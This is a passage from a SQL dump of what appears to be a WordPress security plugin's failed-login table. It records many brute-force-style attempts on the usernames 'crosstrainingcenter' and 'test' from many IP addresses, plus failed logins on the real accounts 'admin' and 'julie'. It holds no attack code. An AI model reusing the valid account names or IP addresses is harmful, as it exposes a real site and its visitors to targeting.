(103593, 1499833893.824226, 1, 'loginFailInvalidUsername', 'test', 0, 3004856574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103594, 1499833895.262212, 1, 'loginFailInvalidUsername', 'test', 0, 3004856574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103595, 1499836517.835034, 1, 'loginFailInvalidUsername', 'test', 0, 1001097570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103596, 1499836519.552728, 1, 'loginFailInvalidUsername', 'test', 0, 1001097570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103597, 1499838078.522391, 1, 'loginFailInvalidUsername', 'test', 0, 2985722518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103598, 1499838079.780637, 1, 'loginFailInvalidUsername', 'test', 0, 2985722518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103599, 1499840780.305566, 1, 'loginFailInvalidUsername', 'test', 0, 2946418965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103600, 1499840781.936563, 1, 'loginFailInvalidUsername', 'test', 0, 2946418965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103601, 1499842110.023586, 1, 'loginFailInvalidUsername', 'test', 0, 1279792599, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103602, 1499842111.219474, 1, 'loginFailInvalidUsername', 'test', 0, 1279792599, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103603, 1499843314.675465, 1, 'loginFailInvalidUsername', 'test', 0, 2049707949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103604, 1499843316.305951, 1, 'loginFailInvalidUsername', 'test', 0, 2049707949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103605, 1499847783.899889, 1, 'loginFailInvalidUsername', 'test', 0, 246024145, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103606, 1499847785.583786, 1, 'loginFailInvalidUsername', 'test', 0, 246024145, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103607, 1499848725.596640, 1, 'loginFailInvalidUsername', 'test', 0, 1410977262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103608, 1499848726.596772, 1, 'loginFailInvalidUsername', 'test', 0, 1410977262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103609, 1499851728.637281, 1, 'loginFailInvalidUsername', 'test', 0, 2945210445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103610, 1499851730.120717, 1, 'loginFailInvalidUsername', 'test', 0, 2945210445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103611, 1499853773.640185, 1, 'loginFailInvalidUsername', 'test', 0, 1471709157, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103612, 1499858452.108718, 1, 'loginFailInvalidUsername', 'test', 0, 1790266524, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103613, 1499858453.847605, 1, 'loginFailInvalidUsername', 'test', 0, 1790266524, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103614, 1499858472.668166, 1, 'loginFailInvalidUsername', 'test', 0, 702705461, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103615, 1499858474.138911, 1, 'loginFailInvalidUsername', 'test', 0, 702705461, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103616, 1499858929.106350, 1, 'loginFailInvalidUsername', 'test', 0, 462663250, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103617, 1499858930.833816, 1, 'loginFailInvalidUsername', 'test', 0, 462663250, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103618, 1499860261.144659, 1, 'loginFailInvalidUsername', 'test', 0, 1374395776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103619, 1499860262.151838, 1, 'loginFailInvalidUsername', 'test', 0, 1374395776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103620, 1499860981.064281, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2047075655, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103621, 1499860984.060613, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2047075655, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103622, 1499862779.106898, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835497269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103623, 1499862780.320058, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835497269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103624, 1499862932.750104, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657631490, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103625, 1499862934.164266, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657631490, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103626, 1499863086.100158, 1, 'loginFailValidUsername', 'crosstrainingcenter', 0, 2087197149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103627, 1499863087.820538, 1, 'loginFailValidUsername', 'crosstrainingcenter', 0, 2087197149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103628, 1499863503.225581, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1731811175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103629, 1499863504.700259, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1731811175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103630, 1499863919.210607, 1, 'loginFailInvalidUsername', 'test', 0, 1146224722, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103631, 1499863925.181248, 1, 'loginFailInvalidUsername', 'test', 0, 1146224722, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103632, 1499864423.382340, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1540340196, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103633, 1499864424.445407, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1540340196, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103634, 1499864437.116502, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 28976514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103635, 1499864438.346757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 28976514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103636, 1499866196.062661, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3200394026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103637, 1499866197.539589, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3200394026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103638, 1499866427.948893, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1324384782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103639, 1499866428.940750, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1324384782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103640, 1499867460.350649, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 692435087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103641, 1499867462.188414, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 692435087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103642, 1499868369.593558, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2393026044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103643, 1499869350.013377, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/532.86.33 (KHTML, like Gecko) Version/5.3.8 Safari/530.79'),
(103644, 1499869653.711238, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2107664388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103645, 1499869656.030359, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2107664388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103646, 1499869794.274344, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3314816916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103647, 1499869796.171172, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3314816916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103648, 1499870179.417696, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1484376590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103649, 1499870180.452938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1484376590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103650, 1499870351.298593, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887825197, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103651, 1499870352.579074, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887825197, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103652, 1499870809.873735, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2047867266, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103653, 1499870811.239964, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2047867266, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103654, 1499874156.167443, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1515795123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103655, 1499874157.200815, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1515795123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103656, 1499875353.288018, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1438314759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103657, 1499875354.343792, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1438314759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(103658, 1499880894.341714, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892040430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103659, 1499880895.924837, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892040430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103660, 1499883261.670732, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892535184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103661, 1499883263.344405, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892535184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103662, 1499885306.055557, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3743315258, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103663, 1499885307.430949, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3743315258, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103664, 1499886151.637327, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1369719043, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103665, 1499886152.597826, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1369719043, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103666, 1499886809.413031, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2152704098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103667, 1499889441.777647, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3257560762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103668, 1499889442.800711, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3257560762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103669, 1499890032.220772, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 42616701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103670, 1499891816.743273, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2630978203, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103671, 1499891818.215973, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2630978203, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103672, 1499893718.476328, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2538321431, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103673, 1499893719.617076, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2538321431, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103674, 1499894286.437594, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 701157129, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103675, 1499894287.687060, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 701157129, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103676, 1499896209.933849, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1731616924, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103677, 1499896211.262627, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1731616924, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103678, 1499897583.187622, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979958751, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103679, 1499897584.505255, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979958751, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103680, 1499899199.807108, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1276281314, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103681, 1499899200.975096, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1276281314, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103682, 1499900485.023053, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1581302042, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103683, 1499901182.561065, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3308322317, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103684, 1499901183.666718, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3308322317, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103685, 1499901611.902906, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 704499487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103686, 1499901613.101013, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 704499487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103687, 1499905492.936915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 415247450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103688, 1499905494.548782, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 415247450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103689, 1499912623.327728, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1586182716, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103690, 1499912624.384314, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1586182716, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103691, 1499915435.813856, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694778652, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103692, 1499915436.879455, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694778652, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103693, 1499918110.482032, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/534.04.57 (KHTML, like Gecko) Version/4.6.1 Safari/532.21'),
(103694, 1499918354.538919, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1235952074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103695, 1499924165.260509, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3472852924, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103696, 1499924166.979789, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3472852924, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103697, 1499925680.181082, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3018378221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103698, 1499925681.611082, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3018378221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103699, 1499930541.989623, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742045941, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103700, 1499930543.970217, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742045941, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103701, 1499931767.493728, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 703760406, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103702, 1499931768.733205, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 703760406, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103703, 1499933253.242091, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1403381105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103704, 1499933254.208737, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1403381105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103705, 1499936771.151949, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979315283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103706, 1499936772.526032, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979315283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103707, 1499937294.202643, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103708, 1499941054.761689, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3377866446, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103709, 1499941056.247584, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3377866446, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103710, 1499942583.592554, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2996127776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103711, 1499942584.635828, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2996127776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103712, 1499945447.096568, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1467268581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103713, 1499945448.137289, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1467268581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103714, 1499950981.875605, 1, 'loginFailValidUsername', 'julie', 2, 915750734, ''),
(103715, 1499954893.329745, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781731758, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103716, 1499954894.609899, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781731758, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103717, 1499955004.993854, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3536058233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103718, 1499955006.639849, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3536058233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103719, 1499955363.318212, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3005793335, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103720, 1499955364.769688, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3005793335, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103721, 1499958896.420706, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2975966430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103722, 1499958897.892551, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2975966430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103723, 1499958927.078609, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2399159864, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103724, 1499958928.468742, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2399159864, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103725, 1499959131.269516, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000294731, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103726, 1499959132.261970, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000294731, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103727, 1499960233.161153, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 89774375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103728, 1499960234.755380, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 89774375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103729, 1499961687.407316, 1, 'loginFailValidUsername', 'julie', 2, 874674276, ''),
(103730, 1499964519.206692, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.97.50 (KHTML, like Gecko) Version/5.5.0 Safari/532.14'),
(103731, 1499964716.814703, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2696033151, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103732, 1499964717.877707, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2696033151, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103733, 1499965445.051959, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3481717135, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103734, 1499967702.651124, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2537068122, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103735, 1499967703.686203, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2537068122, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103736, 1499967944.146978, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 520125869, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
